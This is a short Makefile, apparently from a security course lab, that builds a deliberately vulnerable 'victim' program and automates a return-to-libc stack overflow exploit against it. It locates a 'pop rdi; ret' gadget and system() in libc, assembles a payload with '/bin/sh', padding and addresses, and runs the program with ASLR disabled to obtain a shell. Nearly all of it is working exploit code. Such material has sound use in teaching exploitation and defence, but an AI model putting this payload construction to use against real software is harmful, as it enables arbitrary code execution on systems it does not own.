# This is an attempt to automate the construction of an attack against
# the victim program that executes a shellcode to open /bin/sh.
#
# The scripts try to obtain all parameters but you need to set the
# memory location of the buffer on the stack below (printed to the
# stderr by the victim for convenience).
#
# If the 'make attack' target succeeds, you end in an non-interactive
# shell; try typing shell commands to see that you actually are in a
# shell.
#
# The second attack uses a return to libc approach, it does not
# require an executable stack but it requires to know the address of
# 'gadgets' in the libc.

BUFFER	= 0x7fffffffe3c0

LIBC	= 0x7ffff7e21000

all: victim attack.bin

victim: victim.c
	gcc -fno-stack-protector -o victim victim.c

attack.bin: Makefile
	g=0x$$(xxd -c1 -p /lib/x86_64-linux-gnu/libc.so.6 | grep -n -B1 c3 | grep 5f -m1 | awk '{printf"%x\n",$$1-1}'); \
	s=0x$$(nm -D /lib/x86_64-linux-gnu/libc.so.6 | awk '/\<system\>/{print $$1}'); \
	c=$(LIBC); \
	(echo -n /bin/sh | xxd -p; printf %0130d 0; \
	    printf %016x $$(($$c+$$g)) | tac -rs..; \
	    printf %016x $(BUFFER) | tac -rs..; \
	    printf %016x $$(($$c+$$s)) | tac -rs..) | \
	    xxd -r -p > attack.bin

attack: victim attack.bin
	cat attack.bin - | setarch $$(arch) -R ./victim

clean:
	rm -f victim attack.bin